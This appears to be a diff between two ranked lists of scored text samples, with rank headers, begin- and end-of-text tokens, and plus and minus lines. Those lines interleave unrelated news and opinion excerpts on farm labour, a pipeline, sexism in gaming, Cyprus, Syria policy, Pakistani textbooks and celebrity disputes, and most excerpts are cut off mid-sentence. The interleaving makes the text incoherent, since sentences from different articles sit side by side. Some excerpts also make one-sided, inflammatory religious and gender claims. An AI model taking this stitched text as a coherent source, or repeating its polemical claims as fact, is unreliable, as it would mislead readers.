due to improper construction or the use of substandard materials. +Unskilled workers make much less. A crew of four Hispanics can earn about $150 each by picking 250-300 boxes of tomatoes in a day, said Jerry Spencer, of Grow Alabama, which purchases and sells locally owned produce. A crew of 25 Americans recently picked 200 boxes — giving them each $24 for the day. It may make sense for some to sit on the couch. Unemployment benefits provide up to $265 a week while a minimum wage job, at $7.25 an hour for 40 hours, brings in $290. -Scorching land, torching homes—and killing multiple people. Pipeline explosions in 2016 show why the #NoDAPL fight is still going strong: pic.twitter.com/RNVfIAWwaj — Fusion (@Fusion) December 1, 2016 +Alabama farmers are getting killed by a new draconian law that has chased thousands of undocumented immigrants out of the state. -According to the Center for Biological Diversity, over the last 27 years there have been close to 8,000 oil spills in the United States alone. That’s “nearly 300 per year on average.” +This is brutal work, which is why slaves were once imported to do it, and why it's work now done by the lowest rungs of the socio-economic ladder—immigrants. Just think about the numbers above—four Latinos picked a quarter to a third more tomatoes than a crew of 25 Americans. And sure, those Americans could learn to be more efficient and skilled at the work, but they won't, because they won't put up with that kind of abuse on their bodies (and minds, for that matter) in three-digit temperatures. -If the DAPL were to follow this environmentally destructive trend, there would be far reaching consequences for the Standing Rock Sioux and potentially millions of other Americans. +This is the same problem that Georgia farmers face, as that state cracks down on undocumented immigrants. As one Georgia farmer laments, -Missouri Attorney General Chris Koster said it best: “The River provides drinking water for communities, cooling water for power plants, and a low-cost highway for goods and agricultural products.” +“You can’t find legal workers,” Horner said. “Basically they last a day or two, literally.” -Contaminated water from North Dakota has the potential to hit twelve states, all the way to Louisiana, wreaking havoc across America’s heartland. +The results have been brutal for farmers in Georgia: -The negative impact of the DAPL has already started. There are claims that the Army Corps of Engineers–the government body that approved the project– cut corners by failing to consult with the tribe before letting the pipeline developers, Energy Transfer Partners, proceed with construction. A failed lawsuit in early September argued that, in doing so, the Corps +Charles Hall, director of the Georgia Fruit and Vegetable Growers Association, released figures from an upcoming industry-funded study Tuesday that says farmers lost at least $74.9 million in unpicked crops harvested by hand last spring and summer because they didn’t have enough labor. The farmers ================================================================================ -Rank = 73; Score = 282624.0 -<|begin_of_text|>Women are discriminated against in all areas of gaming. What can we do about it? +Rank = 70; Score = 130048.0 +<|begin_of_text|>Women who seek leadership roles in business often face the prospect, whether real or perceived, of having to choose between nurturing their careers or building a robust family and personal life. The publication in March of Lean In: Women, Work and the Will to Lead, by Sheryl Sandberg, Facebook’s chief operating officer, inspired a renewed debate about feminism. It suggested in a strong, if controversial, fashion that women can have it all. -WARNING: this article involves feminism. Those offended by the idea of gender equality should STEP AWAY FROM THEIR COMPUTERS NOW and get back inside their caves. Not a misogynist? Then hey buddy, sit back and relax. I’d offer you a cup of tea but you’re miles away (and I don’t have any tea). +The confidence and authority that are required of leaders play a role in making choices about how to integrate work and other aspects of life, participants said at a panel titled, “How to be the Champion of Your Own Career,” at the recent Wharton Women in Business conference. Moderated by Arnold J. Rosoff, an emeritus professor of legal studies and business ethics at Wharton, the five-person panel was one of the conference’s first ever to include both men and women. -Sexism permeates our society, that’s a given, but you might not have realised just how much it occurs in gaming. There are three levels at which it exists: at an industry level, in games themselves, and from within gamers. It’s vital that we are aware of these problems but, more importantly, we have to do our best in tackling them. To do this, we must look at each problem in turn. +Early in the discussion, J.J. Cutler, executive vice president of Aramark, invoked the title of the panel and sought to broaden the subject. “I would be very thoughtful about how you define ‘career,’” he said. “Instead of thinking about being a champion of a career, I’d think about just being a champion of your life. In particular, I would be very thoughtful — and it will change over time — about what role you want work and career to play in your overall life. -First: sexism in the industry. There is evidence that suggests women who work in gaming are under-represented and suffer some of the worst gender-based harassment. Female gamers make up 45% of the gaming population; yet male game designers make up 89% of the industry and earn 23.6% more than their female counterparts. What a kick in the balls vagina. There have also been many high-profile incidents of women being harassed by men in the workplace. One of the most recent stories involved Josh Mattingly, CEO and founder of Indiestatik, publicly apologising and “stepping down” after sending a female game developer inappropriate and unprovoked sexual messages on Facebook. +“Be really flexible,” Cutler added. “Your life is likely going to get messier and more complicated, and the world is going to get more complicated from here on out.… Creating a vision for yourself is great, but I would be careful about [making] too many hard and fast rules and plans.” -People have claimed that women should just stand up for themselves and that speaking up against those that harass them should be enough to stop the problem, but there is not always a clear cut solution. The #thatwoman hashtag shows that in speaking up, women are likely to be ostracised and have it limit their future career. Perhaps the risk would be worth the overall benefits, but it is understandable why women in gaming don’t always feel free to confront those that may oppress or belittle them. It would be like Yoshi trying to stand up to Mario – he’s just going to drop Yoshi mid-jump and carry on like nothing happened anyway. +Creating a vision for yourself is great, but I would be careful about [making] too many hard and fast rules and plans.”— J.J. Cutler -Similarly, the #1reasonwhy hashtag asked women to speak out about why they don’t feel comfortable in the gaming industry. The results included stories of groping and being constantly mistaken for assistants and receptionists. +Picking the right partner, Cutler said, is “super important.” He noted that Sandberg may have raised fewer eyebrows than a man would have in choosing to discuss the role of a romantic partner in a businesswoman’s career. “The people I’ve observed who are happy, successful [and] fulfilled, oftentimes … [have someone] outside of work who, when good stuff happens, the good stuff is a lot better, and when bad stuff happens, you’ve got someone there who can help you deal with it,” he stated. “And there will be both. Of all the stuff in Lean In, I actually think +================================================================================ +Rank = 71; Score = 129536.0 +<|begin_of_text|>Cementing its reputation as a slow-motion corporate car-crash, made-up technology specialist Magic Leap has been sued for sex discrimination by the woman it hired to tackle sex discrimination. -Jade Raymond, Producer of Assassin’s Creed, was accused of using her looks to sell the game +Tannen Campbell filed in a Florida court [PDF] this week accusing the virtual-reality startup of maintaining a "hostile environment" and a "macho bullying atmosphere." She claimed she was fired after she challenged CEO Rony Abovitz on the "depths of misogyny in Magic Leap's culture." -What is there to be done about -================================================================================ -Rank = 74; Score = 280576.0 -<|begin_of_text|>Cyprus is Turkish, after all. Turks can do whatever they want there. They can even celebrate dropping napalm on Greeks and slaughtering them. +As VP of strategic marketing and brand identity, Campbell says part of her job was to help the tech company with what it called its "pink/blue problem" (quick hint: not calling gender inequality a "pink/blue problem" is probably a good first step). -Uzay Bulut The writer is a Turkish journalist and political analyst formerly based in Ankara. She now lives in the United States. More from the author ► The writer is a Turkish journalist and political analyst formerly based in Ankara. She now lives in the United States. +The pinkness was also literally an issue: the all-male tech team (who were matched by the all-male advertising and executive teams) were asked to consider how to make their augmented reality headset more female friendly and, according to Campbell, the only solution they arrived at was to produce a version in pink. -On August 8, Muslim Turkish Cypriots and illegal settlers from Turkey celebrated the 53rd anniversary of Turkey’s napalm bombing of Greek Cypriot civilians in the Turkish-occupied enclave of Kokkina in Cyprus. Mustafa Akıncı, the president of the self-styled “Turkish Republic of Northern Cyprus” (TRNC), which is recognized only by Turkey, also participated in the celebrations. +The lawsuit then offers a wide range of accusations of sexism, stemming from tetchy to highly personal to jaw-dropping. For starters, she took issue with the fact that the Florida company's jobs page was titled "Wizards wanted," seemingly shutting out women. -In August 1964, Turkish warplanes dropped napalm bombs on Kokkina in the Tillyria peninsula, hitting residential areas and a hospital, and killing more than 50 people, including 19 civilians. Ten years later, in 1974, Turkey invaded Cyprus and has occupied almost 40 percent of the island ever since. +She then goes on to slam the CFO for being "the kind of man who sits a little too close to women," and the VP of IT for being loud and making "misogynistic comments." She even turns on the company's most senior woman, its chief business officer, accusing her of being "the perfect Magic Leap female employee: she went to Harvard, never disagrees with Abovitz and always does Abovitz's bidding." -The Ministry of Foreign Affairs of Greece issued a note of condemnation regarding the celebrations: +Presentation -“We are dismayed to note the celebrations of the Turkish Cypriot leadership, including Mr. Akinci himself, of the 53rd anniversary of the use of chemical weapons and dropping of napalm bombs by the Turkish air force on the Tillyria peninsula. This was the first use of banned chemical weapons in the history of our planet. +Before you start writing off Campbell, however, she goes into some depth on the practices and approaches she recommended Magic Leap adopt in order to bring about a more balanced workplace, and they are good. Although some are perhaps more of a wish list – such as paying for a recruiter to help the partners of female hires relocated to Florida to find jobs as well to help ease the move to the company, and paying for female tech leaders including Sheryl Sandberg and Meg Whitman to attend company meetings as speakers. -“Today, when the whole planet bows to the victims of wars and such hostile acts, the holding of and participation in such celebrations is an affront to international law, to the memory of the fallen, and to the whole of humanity.” +She developed a presentation for CEO Abovitz but her scheduled meeting to go over it was cancelled no fewer than six times. It took her eight months to get the meeting, and then he terminated the meeting about halfway through. Efforts +================================================================================ +Rank = 72; Score = 129536.0 +<|begin_of_text|>Nothing is like anything else. You can do nothing well or you can do nothing badly. Some people excel at nothing. Others have more difficulty with it. They grow restless, resent the loss of initiative and control, and, more deeply, they feel that “something” is inherently, even morally, superior to nothing. -The Republic of Cyprus declared independence in 1960. Afterwards, Turkey escalated its preparations to invade the island, which included but were not limited to establishing a bridgehead at Kokkina in 1964 and smuggling arms and fighters from Turkey into the area in order to strengthen Turkish positions there. +The U.S. government national security apparatus, for better or for worse, sucks at nothing. In the policy process, the saying goes, something always beats nothing. As a bureaucratic fact, this is clearly true. But, from a policy perspective, is nothing always the wrong choice? -According to the High Commission of the Republic of Cyprus in London, +Currently, the Trump administration is engaged in something of a natural experiment on this question in eastern Syria. U.S. forces went to eastern Syria in 2014 to defeat ISIL. Now, with ISIL losing its last grip on territorial control in Syria, the foreign policy apparatus is reprising a time-honored tradition and asking itself what those forces should do next. The answer is unlikely to be nothing. -“When in August 1964 the [Cypriot] Government attempted to contain the Kokkina bridgehead, Turkey's air force bombed the National Guard and neighboring Greek villages with napalm and threatened to invade. The other major purpose served by the enclaves was the political and physical separation of the two communities.” +In what is surely a dizzying array of internal meeting and papers, the debate centers on how the United States should leverage its military presence in Syria, which the Pentagon recently acknowledged exceeds 2,000 troops, to pursue other objectives, namely countering Iran’s influence or post-conflict stabilization, or both. Entering into that debate, Faysal Itani has argued in this journal that a “small-time” U.S. mission in Syria would be unable to effectively counter Iran, pointing to the “imbalance of commitment and interests between the United States and Iran” and the overwhelming numerical advantage of pro-Iran forces. He notes that the United States would need a force of many “tens of thousands of combat troops” in Syria to challenge Iran or contribute to the country’s reconstruction process. -Another preparation for +Consistent with U.S. government practice, Itani ignored the nothing option. He is certainly right about the limitations of the small U.S. force presently in Syria. But even a much larger force would stand a poor chance of rolling back — or even containing — Iranian influence in the war-ravaged country. The reason for this is the very “imbalance” on which Itani’s argument against a small force rests. Syria is simply not central to U.S. interests and, as such, Iran’s cost tolerance will far outpace that of the United States at almost any level of conceivable commitment. + +Bashar al-Assad’s continued rule is obviously undesirable, not least for his wanton abuse of the Syrian people. Iran’s ================================================================================ -Rank = 75; Score = 278528.0 -<|begin_of_text|>Civil unions are an inadequate substitute for marriage. Creating a separate, new legal structure to confer some benefits on same-sex couples neither honors American ideals of fairness, nor does it grant true equality. The results are clearly visible in New Jersey, which continues to deny same-sex couples some of the tangible civil benefits that come with marriage. +Rank = 73; Score = 128512.0 +<|begin_of_text|>Japan's efforts to recruit Indian IT engineers won't work. For a simple reason: these engineers are better off at home. -Gov. Jon Corzine of New Jersey has long said that he would sign a measure granting the right to marry to couples of the same sex. We are heartened that he has declared that that should happen sooner rather than later. +With the domestic talent pool shrinking, Japan desperately needs foreign talent to fill the gap and revive its ailing economy. Especially IT engineers, where the country is expected to face a shortage of 600,000 positions. -We hope Mr. Corzine intends to prod legislators into passing such a law early in the 2009 session. That would make New Jersey the first state to legalize marriage for same-sex couples through legislative action. Three other states — Connecticut, Massachusetts and California — have done so through the courts. Unfortunately, California voters approved a ballot measure in November rescinding that right, at least for now. +That’s why Tokyo is reaching to Asian countries like India, where it has launched a program called Project Indian Institutes of Technology (PIITs), inviting students from the Indian Institutes of Technology (IIT) to spend their internships at Japanese firms. -Mr. Corzine made his statement after a state commission released its final report on New Jersey’s two-year-old civil union law. The commission noted the hurt and stigma inflicted by shutting out gay people from the institution of marriage. It also found that civil unions do not assure gay couples of the same protections, including the right to collect benefits under a partner’s health insurance program and to make medical decisions on behalf of a partner who is unable to do so. The panel concluded unanimously that the state should enact a law to remove the inequities. +Apparently, Tokyo hopes that some of these Indian engineers will opt to stay with Japanese firms beyond the internship time. -We regret that the leaders of the state’s Democratic-controlled Legislature do not view this issue with the same urgency. Senate President Richard Codey, for instance, said recently that progress in civil rights areas “is typically achieved in incremental steps.” We suspect that political expedience is clouding Mr. Codey’s sense of fairness. Next year in New Jersey, the governorship and all seats in the Assembly are up for grabs in an election. Some Republicans already are talking about making their opposition to same-sex marriage a campaign issue. +But judging from the overwhelming response to a previous piece of ours on the topic, Asian talent doesn’t seem eager to work in Japan. -Governor Corzine typically takes the right side on important issues, but he has been known to retreat in the face of opposition. We hope that’s not the case here. It’s past time for him and for the Democrats in Trenton to find the political courage to extend the right to marry to gay couples.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 76; Score = 278528.0 -<|begin_of_text|>There is a point to including playable female characters in games. I’m aware that most of the people likely to comment on this article (go ahead and bleat about misandry, you worms; I’ll enjoy a tasty cup of your male tears) don’t see that, but I’m also aware that the vast majority of people who read this article do see it, and won’t bother to leave a comment because what I’m saying in this editorial seems sensible, practical, and non-controversial. Such is the way of the Internet. So I’m not going to bother writing out a lengthy justification of why we genuinely need female characters in video games for the good of the industry financially and artistically; if you honestly can’t understand it, go forth and educate yourself. If you feel that gaming is the one thing remaining to men and girls should stop spoiling it with political correctness, then please go boil your head because I see no point in debating with people incapable of basic logic and lacking humanity. +The problem? Japan isn’t prepared to provide what foreign talent needs — a career, due to the lack of the right “regime,” the socioeconomic conditions and cultural mindset, prevailing in Japanese corporations. -Having taken it as fact that there is a point to including female characters in video games, why on earth are we still hearing excuses for their absence in 2014? Because it is an excuse. There is no reason not to do it. You won’t alienate your existing market by acknowledging the existence of women. You won’t take anything away from your existing market. +In fact, Indians are better off home. New Delhi is better prepared than Tokyo to attract and retain talent. -Yet another clueless wonder is yapping about the absence of the unnecessary from video games:I am a game designer. I am designing and producing a game that does not, and will not, have a single female character in it. This is not because I am misogynistic. This is not because I do not women to play the game. This is because putting women in the game makes no sense, violates the principle of the suspension of disbelief, and will not make the game any better as a game.I am the lead designer of First Sword, a combat management game. The game has orcs and men, elves and dwarves. It has goblins and trolls. But it has no women.Why not? Because the game is a gladiator game. Women cannot credibly fight as gladiators. We don't put women in the game for the same reason we don't put bunny rabbits or children in the game. Putting women in the game would be an act of brutal sadism, an act of barbarism even by pagan Roman standards. While the Romans did occasionally put female gladiators in the arena, they were there as a comedic act. -================================================================================ -Rank = 77; Score = 278528.0 -<|begin_of_text|>Pillars getting in the way of ceiling cables, water pipes clashing with electrical wires - Mr Yip Shaw Chong has seen many such mistakes on construction sites. +That’s one of the key findings of the 2016-17 International Competitiveness report (World Economic Forum), which ranks India 23 in the capacity to attract talent -- well ahead of Japan, which ranks 77. Also, India ranks ahead of Japan in the capacity to retain talent—see table. -Such errors might require cables to be rerouted or walls to be hacked, wasting resources and time and jeopardising the schedules which Mr Yip oversees as senior project manager at Shimizu Corporation's Singapore office. +Country Capacity to attract talent Capacity to retain talent Japan 77 38 India 22 32 -"Traditionally, we had drawings for each trade," he explains, one set of technical drawings showing electrical works, another showing water pipes, another the walls, and so on. +Source: World Economic Forum -"Of course, an experienced guy would be able to layer them together and visualise that they will clash. But, inevitably, somebody misses something, there's a clash on site and somebody has to go and fix it." +Fund/ETF 12-month Performance iShares MSCI Japan (EWJ) 15.07% iShares India (NDY) 20.76 -Today, however, spotting such errors can easily be done by a beginner, or even a computer program. This is thanks to the rise of Building Information Modelling (BIM), a data-heavy virtual 3D-modelling technology that the industry has been increasingly pushed to adopt since the start of the decade. +Source: Yahoo.finance.com 6/30/2017 -Related Story Smart cities, smoother lives through digital connectivity +There are a couple of good explanations for that. Talent is highly mobile. And it goes where growth and opportunity is. In the last couple of decades, India has been growing at near double-digit rates, while Japan has been floundering in the swamp of stagnation. -Since last July, all building plans for new projects with a gross floor area of 5,000 sq m and more have had to be submitted in BIM format for regulatory approval. +Meanwhile, India has been attracting foreign giants, like Amazon, and they have been setting up research centers to tap into the country’s pool of software engineers and programmers, as its own companies continue to internationalize their operations. -The great advantage of BIM software is that it can combine all plans - architectural, engineering, and mechanical and electrical (M&E) - into one integrated model. +So why leaving home to head to Japan?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 74; Score = 128000.0 +<|begin_of_text|>Pakistani textbooks are mostly anti-Hindu & anti-Indian under the influence of Quranic teachings. -"Before, you looked at the 2D drawings, this floor and this floor, and then you tried to visualise whatever intersections there were," says Mr Yip. "Whereas now, you have a model, so it's easier to see clashes." +Pak Textbooks are anti-Hindu… anti-Indian… -Recent versions of software are even able to automatically spot and highlight these conflicts. +Pakistani textbook controversy: They think something, tell different and do harrowing. -NEW WAYS OF SEEING +“Any material considered ‘inflammatory’ or ‘discriminatory’ to religious minorities should be removed from the syllabus as the government should seriously take action on this matter”, say Salman Ali and Saira Ahmed in a co-written piece in Daily Times Pakistan. But all these dramatic write up and govt announcements come at the verge of extinction of Hindus from the Map of Pakistan! Actually, the textbook controversy & reformations etc. in Pakistan are nothing but an eyewash to prove Islam is not so bad. -Admittedly, a lot of work must be done upstream to save time on site. +Upendra Bharti | HENB | New Delhi | Dec 30, 2016:: On August 11, 1947, three days before the announcement of the independence of Pakistan- separated from India as two parts East and West Pakistan, the Father of the Nation Mohammad Ali Jinnah in his speech said, “You are free; you are free to go to your temples, you are free to go to your mosques or any other place of worship in this State of Pakistan. You may belong to any religion or caste or creed — that has nothing to do with the business of the State. We are starting in the days where there is no discrimination, no distinction between one community and another, no discrimination between one caste or creed and another. We are starting with this fundamental principle: that we are all citizens, and equal citizens, of one State.” -Fast Forward series +Ridiculous. Sowing the seeds of Islamic communalism in the minds of Muslims of Indian subcontinent and through a holy war named- ‘Direct action’, Jinnah materialized the dream of Pakistan which took the lives of millions and uprooted the innocent people from their soil numerously. -With Singapore firmly focused on the Future Economy, The Straits Times' series, Fast Forward: Disruption and the Singapore Economy, helps you make sense of the big shifts that will shake up entire sectors, reshape jobs and change lives. Every Saturday for 12 weeks, the paper's journalists will examine a disruptive force, its likely impact on the economy and how soon that will be felt. From robotics, 3D printing and smart buildings to dire demographic trends, the global skills revolution and the Asean growth story. Next week, find out more about green technology and +When Pakistan was created in 1947, Hindus constituted about 16% of the population of West Pakistan+ (current Pakistan); by 2016 it is about 1.68% – the population has declined by about 90% in about 70 years. This decimation is the outcome of sustained legal and social discrimination ever since the creation of Pakistan. The situation of minority persecution in has not been stopped anyway. The overall situation of synchronized plights on Minority Hindus (mostly Dalit/ Scheduled caste and tribal categories) through physical torture, bonded labour, abduction, ransom, attack ================================================================================ -Rank = 78; Score = 276480.0 -<|begin_of_text|>Delhi Metro rides will be costlier from Wednesday, and then again in October. +Rank = 75; Score = 128000.0 +<|begin_of_text|>There’s no such thing as “books for boys” and “books for girls.” But because gendering is a cultural phenomenon, brought on by social beliefs that there are inherent and important differences between boys and girls, it’s impossible to escape those ideas. This is why adults continue to lament the lack of books “for boys” in the world. It’s why there are continuous articles and think pieces about what happened to the books “for boys” in kid lit. Even the most well-meaning, socially-conscious adults fall into this trap, believing that the boys are being left behind and that girls and girl interests “dominate” the children’s book world. + +But what does it mean for a book to be “for boys?” Is it a male author? Is it a male main character? Is it a book that appeals to the interests of boys specifically, whatever those are? -The Delhi Metro Rail Corporation (DMRC) announced on Monday the revised fares – a minimum of Rs 10 from the earlier Rs 8 and a maximum of Rs 50. +Today, Amazon released their 2014 top-selling titles. Let’s take a look at what the hits in kids and teens were. -The 15-km slab, which has been raised from Rs 18 to Rs 30, is likely to hurt daily commuters the most. +It’s a nice mix of books for very young readers, as well as books for those who are older teen readers. But…tell me where the women are dominating here? -The fare structure will change again from October 1 when the minimum fare for travelling a distance of more than 2 km will go up by another Rs 10. +If we were to break down the books by gender — which is subjective and ridiculous, but we’re going to do it — then we could note that male authors constituted 11 of the 20 authors on the list. There were 7 female authors listed and there were two books from Scholastic, with no authorship attached. I did not count Kathryn Limbaugh because the books isn’t selling on her authorship in the least (that’s all Rush), and I did not count Michael Chamberlain because he’s a narrator, not the writer. -Here’s a calculator to help you find out how much your fare will increase. Just select two stations, and it’ll tell you how much more money you’ll have to pay to ride the Delhi Metro. +If you rolled the Minecraft books into the male author category, which makes sense since Minecraft is a “boy” thing, then you’d show 13 “books for boys” and 7 “books for girls.” -If you are unable to view the calculator, click here +But wait! -First Published: May 09, 2017 19:58 IST<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Veronica Roth’s Four isn’t about a female character. It’s a collection of short stories about Four, a main male character in her best-selling Divergent series. So let’s move that book over to the “books for boys” category, too. Now we’re up to 14 “books for boys” and 6 “books for girls.” If you’re going to play by that game, too, then R. J. Palacio’s The Julian Chapter is also a “book for boys,” since the main character is a boy and he’s featured ================================================================================ -Rank = 79; Score = 276480.0 -<|begin_of_text|>He said, she said. Eddie Cibrian is speaking out once more against his ex-wife, Brandi Glanville. +Rank = 76; Score = 127488.0 +<|begin_of_text|>First doctors, now bunnies. -Last week, Glanville, 44, accused the actor and his current wife, LeAnn Rimes, of allegedly stalking her boyfriend, Donald Friese, on social media. In a series of tweets, she claimed that Rimes, 34, watched four of Friese’s Snapchats before showing up with and Cibrian and Glanville’s two sons at the same Malibu restaurant last month. +A valuable giant rabbit that was “fit as a fiddle” — and destined to be the world’s biggest bunny — mysteriously died while flying United Airlines UAL, -0.06%, a report says. -“Stalking my boyfriend to show up with my kids was the last straw,” Glanville tweeted. +“Something very strange has happened and I want to know what,” fumed breeder Annette Edwards, 65, of the U.K. -Now, Cibrian, 43, is telling his side of the story. +“I’ve sent rabbits all around the world and nothing like this has happened before,” she told The Sun. “The client who bought Simon is very famous. He’s upset.” -“Brandi was very drunk and after already being at our table, started to come back again. Her boyfriend ‘ran interference’ and came to ask if she could take photos with the kids,” Cibrian claims in an exclusive statement to Us Weekly. “After witnessing Brandi’s behavior at the restaurant I was concerned about what pictures Brandi might post. We looked at their socials after we got home to make sure there was nothing of concern. That’s exactly how it all went down.” +Edwards had been flying with the three-foot Continental Giant rabbit, dubbed Simon, out of Heathrow Airport to his new celebrity owner in the U.S. when he inexplicably kicked the bucket. -The Rosewood actor previously opened up about the situation on June 10. “I normally don’t respond to Brandi’s foolishness but I will not allow false and reverse accusations to go unanswered about my wife,” Cibrian told Us in a statement at the time. “LeAnn is a fantastic stepmom to the boys and is always gracious to their mother. Having to put up with Brandi’s made up drama all the time is extremely frustrating. After eight years we should have one priority, making sure two incredible kids are loved and remain happy and healthy. But every couple of months there is another accusation coming from Brandi in an attempt to drum up drama to stay relevant.” +“Simon had a vet’s check-up three hours before the flight and was fit as a fiddle,” she explained. -He added: “LeAnn and I did not nor have we ever ‘shown up’ at places where Brandi will be. Why would we do that? Makes no sense. We had a reservation held at Nobu five days before Brandi posted she was going. Here is proof and if anyone needs more, call Nobu and they will confirm.” +The prized pet had been stored in the cargo section of the Boeing 767, which is where United Airlines crew members found his lifeless body upon landing at Chicago’s O’Hare International Airport — the same place the infamous David Dao incident occurred. -Cibrian and the former Real Housewives of Beverly Hills star divorced in 2010 after nine years of marriage. As Us Weekly exclusively revealed, Cibrian and Rimes fell for each other while filming the 2009 Lifetime movie Northern Lights together. +On April 9, Dao was forcibly removed from his seat and battered by airport police in the attempt to make room for United staff. The doctor’s attorney later claimed that the incident left him with a concussion, a broken nose and two missing front teeth. -Despite -================================================================================ -Rank = 80; Score = 274432.0 -<|begin_of_text|>MEPs have revealed they want boys to learn about traditionally ‘female’ activities and should be taught domestic work and care at school. +Read: America’s least favorite airline is NOT United Airlines -The Brussels politicians said they want to stand against ‘sexist’ education by encouraging children to take an equal interest in all subjects ‘beyond gendered 